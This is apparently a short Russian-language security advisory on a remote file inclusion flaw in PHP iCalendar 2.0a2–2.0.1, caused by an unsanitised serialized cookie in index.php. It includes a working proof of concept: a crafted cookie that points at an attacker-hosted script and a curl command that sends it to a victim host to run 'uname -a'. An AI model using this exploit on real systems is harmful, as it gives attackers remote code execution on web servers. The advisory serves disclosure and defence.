Программа: PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре phpicalendar файла куки в сценарии index.php. Удаленный пользователь может с помощью специально сформированного файла куки подключить и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Пример:
a:1:{s:11:"cookie_view";s:23:"http://www.mali.cious/script";}
curl http://www.vic.tim/path/ -b'phpicalendar=
a%3A1%3A%7Bs%3A11%3A%22cookie_view %22%3Bs%3A34%3A%22http%3A%2F%2F
www.ush.it%2Fteam%2Fascii%2F----- %22%3B%7D'-d 'user=uname -a'